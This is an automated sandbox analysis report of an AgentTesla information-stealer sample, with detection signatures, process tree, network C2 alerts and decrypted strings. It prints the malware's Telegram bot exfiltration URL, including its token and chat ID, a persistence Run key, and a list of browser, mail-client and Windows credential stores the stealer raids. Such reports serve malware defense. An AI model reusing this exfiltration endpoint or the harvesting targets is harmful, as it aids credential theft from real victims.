Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO54782322024.exe

Overview

General Information

Sample name:PO54782322024.exe
Analysis ID:1569681
MD5:5dc11c53470282ca41404226ead4eccd
SHA1:dc93ee506654c5fd14a6c0c851609e1d5aa7ac52
SHA256:676869eec66690665e5a88c85636f738ad095b408973787420c3a1472b5bd482
Tags:AgentTeslaexeuser-koluke
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PO54782322024.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\PO54782322024.exe" MD5: 5DC11C53470282CA41404226EAD4ECCD)
    • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2476 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • WerFault.exe (PID: 1740 cmdline: C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • AppPoint.exe (PID: 6048 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AppPoint.exe (PID: 5012 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage?chat_id=1376739206"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.PO54782322024.exe.17f15f6db50.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.PO54782322024.exe.17f15f43b08.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.PO54782322024.exe.17f15f6db50.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppPoint
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-06T05:51:00.581471+010028517791Malware Command and Control Activity Detected192.168.2.449732149.154.167.220443TCP
                        2024-12-06T05:52:28.772328+010028517791Malware Command and Control Activity Detected192.168.2.449817149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-06T05:51:00.581471+010028528151Malware Command and Control Activity Detected192.168.2.449732149.154.167.220443TCP
                        2024-12-06T05:51:02.936121+010028528151Malware Command and Control Activity Detected192.168.2.449734149.154.167.220443TCP
                        2024-12-06T05:52:28.583138+010028528151Malware Command and Control Activity Detected192.168.2.449818149.154.167.220443TCP
                        2024-12-06T05:52:28.772328+010028528151Malware Command and Control Activity Detected192.168.2.449817149.154.167.220443TCP
                        2024-12-06T05:52:40.926692+010028528151Malware Command and Control Activity Detected192.168.2.449849149.154.167.220443TCP
                        2024-12-06T05:52:46.661125+010028528151Malware Command and Control Activity Detected192.168.2.449861149.154.167.220443TCP
                        2024-12-06T05:52:54.442325+010028528151Malware Command and Control Activity Detected192.168.2.449882149.154.167.220443TCP
                        2024-12-06T05:53:05.473843+010028528151Malware Command and Control Activity Detected192.168.2.449909149.154.167.220443TCP
                        2024-12-06T05:53:06.645593+010028528151Malware Command and Control Activity Detected192.168.2.449915149.154.167.220443TCP
                        2024-12-06T05:53:08.911100+010028528151Malware Command and Control Activity Detected192.168.2.449921149.154.167.220443TCP
                        2024-12-06T05:53:21.770591+010028528151Malware Command and Control Activity Detected192.168.2.449948149.154.167.220443TCP
                        2024-12-06T05:53:29.180396+010028528151Malware Command and Control Activity Detected192.168.2.449968149.154.167.220443TCP
                        2024-12-06T05:53:30.536070+010028528151Malware Command and Control Activity Detected192.168.2.449969149.154.167.220443TCP
                        2024-12-06T05:53:42.317431+010028528151Malware Command and Control Activity Detected192.168.2.450000149.154.167.220443TCP
                        2024-12-06T05:53:45.155874+010028528151Malware Command and Control Activity Detected192.168.2.450006149.154.167.220443TCP
                        2024-12-06T05:54:13.020937+010028528151Malware Command and Control Activity Detected192.168.2.450028149.154.167.220443TCP
                        2024-12-06T05:54:19.802464+010028528151Malware Command and Control Activity Detected192.168.2.450029149.154.167.220443TCP
                        2024-12-06T05:54:24.505235+010028528151Malware Command and Control Activity Detected192.168.2.450030149.154.167.220443TCP
                        2024-12-06T05:54:31.745983+010028528151Malware Command and Control Activity Detected192.168.2.450031149.154.167.220443TCP
                        2024-12-06T05:54:34.114569+010028528151Malware Command and Control Activity Detected192.168.2.450032149.154.167.220443TCP
                        2024-12-06T05:54:39.286315+010028528151Malware Command and Control Activity Detected192.168.2.450034149.154.167.220443TCP
                        2024-12-06T05:54:55.304892+010028528151Malware Command and Control Activity Detected192.168.2.450035149.154.167.220443TCP
                        2024-12-06T05:55:02.124151+010028528151Malware Command and Control Activity Detected192.168.2.450036149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-06T05:51:00.831670+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449732TCP
                        2024-12-06T05:51:03.684238+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449734TCP
                        2024-12-06T05:52:29.005002+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449817TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage?chat_id=1376739206"}
                        Source: RegSvcs.exe.2476.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage"}
                        Source: PO54782322024.exeReversingLabs: Detection: 47%
                        Source: PO54782322024.exeVirustotal: Detection: 48%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: PO54782322024.exeJoe Sandbox ML: detected
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: /log.tmp
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: text/html
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: text/html
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>[
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ]<br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: text/html
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: application/zip
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Time:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>User Name:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>CPU:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>RAM:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IP Address:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <hr>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: New
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IP Address:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: https://api.ipify.org
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: false
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: false
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 1376739206
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: appdata
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: AppPoint
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: AppPoint.exe
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: AppPoint
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: true
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Type
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Run
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <hr>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <b>[
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ]</b> (
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: )<br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {BACK}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {ALT+F4}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {TAB}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {ESC}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {Win}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {KEYUP}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {DEL}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {END}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {HOME}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {Insert}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {NumLock}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {PageDown}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {PageUp}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {ENTER}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F1}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F2}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F3}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F4}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F5}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F6}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F7}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F8}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F9}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F10}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F11}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {F12}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: control
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {CTRL}
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: &amp;
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: &lt;
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: &gt;
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: &quot;
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <hr>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: logins
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Secure Note
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Web Credentials
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Credentials
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SchemaId
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UC Browser
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UCBrowser\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Login Data
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: journal
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: wow_logins
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Safari for Windows
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <array>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <dict>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <string>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </string>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <string>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </string>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <data>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </data>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: credential
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: QQ Browser
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Profile
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: entries
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: category
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: str3
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: str2
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: blob0
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: password_value
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IncrediMail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PopPassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Accounts_New
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PopPassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SmtpServer
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: EmailAddress
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Eudora
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: current
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Settings
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SavePasswordText
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Settings
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ReturnAddress
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Falkon Browser
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \browsedata.db
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: autofill
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ClawsMail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Claws-mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passkey0
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \accountrc
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: smtp_server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: address
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: account
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \passwordstorerc
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Flock Browser
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: APPDATA
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: signons3.txt
